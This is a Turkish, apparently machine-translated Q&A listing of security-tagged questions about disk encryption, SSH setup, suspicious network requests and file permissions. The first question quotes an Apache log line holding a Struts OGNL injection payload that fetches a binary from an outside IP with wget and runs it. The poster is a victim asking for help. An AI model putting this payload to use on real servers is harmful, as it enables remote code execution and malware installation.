«security» etiketlenmiş sorular

Bilgisayar sistemlerinin ve bilgilerin hırsızlık veya veri imhası gibi tehditlere karşı korunması.

2
Bir saldırı girişimi buldum - ne yapmalıyım? [kapalı]
Bazı Apache kayıtlarına bakıyordum ve saldırı gibi görünen şeylerle karşılaştım. core:error] [pid 20356] (36)File name too long: [client xxx.xxx.xxx.xxx:56856] AH00036: access to /${(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context). (#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)). (#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)). (#w=#ct.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()). (#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime(). exec('uname --m|grep x86_64 >> /dev/null || (pkill loop ; wget -O .loop http://111.90.158.225/d/ft32 && chmod 777 .loop && ./.loop) &&(pkill loop ; wget …



1
Ubuntu'da .gpg ve .ssh klasörlerini şifreleyin
Gelecek hafta başka bir ülkeye taşınacağım (bir üniversite projesi için). Dizüstü bilgisayarımı yanıma alacağım. Ubuntu 16.04'ü çalıştırıyorum. Son günlerde verilerimi korumanın birçok yolunu inceliyorum. En ilginç olanlardan biri (Truecrypt arasında) Ev şifrelemesidir. Ancak bunun performans sorunlarına neden olduğunu okudum. Ben bir geliştiriciyim (pek çok birçok küçük metin dosyası var). Özelliklerim …

2
Yerel HDD'den imzasız bir program başlatmak için bir servis kullanırken Güvenlik Uyarısı istemi
Uzak bir Windows Embedded box'ım (temelde WinXPSP3'ün sınırlı özellikli bir kopyası) var; hayatımdaki tek amacı, belirli bir uygulamanın bir kopyasının çalıştığından emin olmak için bir Windows hizmetim var. Değilse, bir kopyasını başlatmak için kodda bir .NET Process.Start () çağrısı kullanır. Bu hizmet ve programın yaklaşık 1300 kutu üzerinde sorunsuzca çalışmasını …

0
Eski hdd'den .exe dosyasına erişilemiyor
Yakın zamanda ssd'yi yeni Windows 10 Pro ile kurdum. Önceki sabit diskim de yeni sdd windows kurulumuma taşınabilir sürücü olarak ekli. Önceki HDD’deki dosyaları ağ üzerinden paylaşamadığım dışında her şey yolunda gitti. Bu küçük sorunu görmezden geldim ve önceki HDD'mde mevcut olan ayarları kullanarak yazılımları yüklemeye devam ettim. Bu yazılımları …

1
“Firefox İndirme Koruması” uyarılarının kaynağı nedir? % 100 geçerli olduklarından nasıl emin olabilirim?
Geçenlerde Debian 9'daki Firefox'u kullanarak aşağıdaki hatayı aldım: Kaynak: https://blog.mozilla.org/security/2016/08/01/enhancing-download-protection-in-firefox/ İndirme işlemini hemen iptal ettim ve onu geçmişimden kaldırdım. Bu öğenin Firefox veya Debian'ı etkilemediğinden% 100 emin olabilir miyim (Debian'ın etkilenmediğinden eminim).

1
Hangi ağın bu işlemi istediğini bulma [yinelenen]
Bu sorunun burada zaten bir cevabı var: Hangi program ve işlem kimliğinin Windows'ta belirli bir IP adresine eriştiğini nasıl bulabilirim? 4 cevap Kemancı koşuyordum ve birdenbire bu isteklerin isteklerini görüyorum hxxp: //zc.qq.com/cgi-bin/chs/numreg/init? ve hxxp: //www.baidu.com/cache/global/img/gs-2.0.gif Ancak hiçbir işlem gösterilmemiştir. Hangi işlemin istekleri yaptığını nasıl belirlerim. Bu istekleri takip ediyor gibi …

1
“Chmod a + rx ~ / Documents” yapmanın güvenlik etkileri nelerdir?
Mac OS X Lion'daki Apache'nin sembolik bağlantılarla çalışmasını sağlamak için bu sayfadaki talimatları izlemem gerekiyordu: https://discussions.apple.com/thread/1771399?threadID=1771399 Yapmam gereken şeylerden biri yürütmek chmod a+rx ~/Documents Belgeler klasörümün sonuçta ortaya çıkan izni şöyle: drwxr-xr-x+ 27 enchilada staff 918 13 apr 11:36 Documents Bu iyi çalışıyor. Şimdi Apache, sembolik bağlantıları düzgün bir şekilde …

1
Bilgisayar verilerini ve hesaplamalarını bozan dış fiziksel faktörlerin olasılığı?
Mantıklı olmayan kötü türlerin tartışılmasında, bellek parçalarını çeviren alfa parçacıklarının bir sıralama algoritması olarak kullanılabileceğini iddia eden bir cevap vardı . Bu beni meraklandırıyor: Dış radyasyon, voltaj dalgalanmaları veya bu gibi fiziksel faktörler veriyi veya hesaplamaları ne kadar muhtemel kılıyor ve bunları değiştiriyor? Ve bu beklenmedik yolsuzluklarla başa çıkmak için …

0
SuSE pam.d SCOM ile İzlemeye Konfigürasyon
Bir SuSE sunucusunu SCOM ile izlemek istiyorum. Sunucunun bir SCOM kullanıcısı var ve SCOM sunucusu kullanıcı adını ve şifreyi biliyor. Ancak SCOM bu kullanıcıyla giriş yapmayı dener ve pam_tally2'deki Arıza sayımı her zaman artar. ve eğer bu kullanıcı ile ssh denersem (scomuser) Arızalar tekrar artar. Başarı önemli değil. Yani, reddetme …

0
Veritabanı Sunucusunda Şifrele (disk seviyesi) MS SQL 2008
Herhangi biri WANSync çalıştıran bir veritabanı sunucusu için disk sürücüleri yerleştirmeyi denemiş mi? Arcserve WANSync'i HA için DB sunucularımıza kullandık ve hem birincil hem de ikincil diskleri bir Bitlocker kullanarak şifrelemeyi planlıyoruz. Tüm disklerin veritabanı sunucularımızda şifrelenmesinin etkisini bilmek istiyoruz: MS SQL 2008 üzerindeki etkisi ne olacak? Yerine çalışma gerçekleştiğinde …


3
Google neden Captchas ile beni yönlendiriyor?
Google neden Captchas ile beni yönlendiriyor? Urlsnooper2'yi açtım ve bunu (aşağıda) buldum. Bilgisayarım neden istediğini bilmiyorum. Son birkaç günde değiştirdiğim şey: Bilgisayarımı yeniden biçimlendirdim (şu anda yamalı, Windows Güvenlik Duvarı ve yönlendiricinin arkasına gizlenmiş) Firefox 4 Ağımda berbat bir bilgisayarı olan bir arkadaşım edelim 3. maddeyi diskalifiye ediyorum çünkü aşağıdaki …

1
Windows 10'da güvenli bir ssh sunucusu nasıl kurulur?
Mac ana bilgisayarında konuk olarak Windows 10 VM çalıştırıyorum. Windows konuk ssh tuşları kullanarak ssh edebilmek istiyorum. Özellikle bu harika olan çeşitli kaynaklar buldum , ancak yazar güçlü şifreler kullanmanızı önerir ve ssh anahtarlarını tercih ederim. Windows'ta güvenli bir * ssh sunucusu kurmak için kanonik bir yöntem var mı? Windows …

Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.